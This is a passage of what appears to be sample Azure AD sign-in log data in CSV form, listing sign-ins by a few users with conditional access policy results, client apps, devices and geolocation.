'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179ea9581200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,62115b57-0cb2-458e-8ba0-179ea9581200,SigninLogs,Sucess,33.7984581,-84.38828278
+1749,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:42.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ab111081-64bd-48b5-9028-d4a13faefcc4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179ec0581200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,62115b57-0cb2-458e-8ba0-179ec0581200,SigninLogs,Sucess,33.7984581,-84.38828278
+1750,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d05a2ce7-2198-4a8a-b2e7-2787ea5c16fd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e05591200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,62115b57-0cb2-458e-8ba0-179e05591200,SigninLogs,Sucess,33.7984581,-84.38828278
+1751,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:18.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,229923a0-c0be-4f30-b322-5bdf3c4e3de3,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3108dc47-edad-48bc-88bb-75ce4c721400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75ce4c721400,SigninLogs,Sucess,36.6404686,-78.26995087
+1752,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:35.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a5674c72-6dc4-42c1-a7db-9747be54e0c1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c457a232-7a13-4abd-a93c-6f0a7aa51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c457a232-7a13-4abd-a93c-6f0a7aa51300,SigninLogs,Sucess,33.7984581,-84.38828278
+1753,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:44.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5de6a9e-f963-4e46-9ff2-a779067796ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c457a232-7a13-4abd-a93c-6f0a009e1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c457a232-7a13-4abd-a93c-6f0a009e1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1754,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:42.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,34164860-cfcf-4ce3-98b3-abba4085b2d8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5949abe0-9b87-40bf-991e-6df71c0d1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,5949abe0-9b87-40bf-991e-6df71c0d1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1755,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:31.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfb594d3-442a-4170-8076-554477d0fa4c,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11779f6a-e330-484b-9e89-76d9a6cc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,11779f6a-e330-484b-9e89-76d9a6cc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1756,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,65001,None,Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.,0,4a965e4a-b329-44c4-b6ae-0bbaec400d7d,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 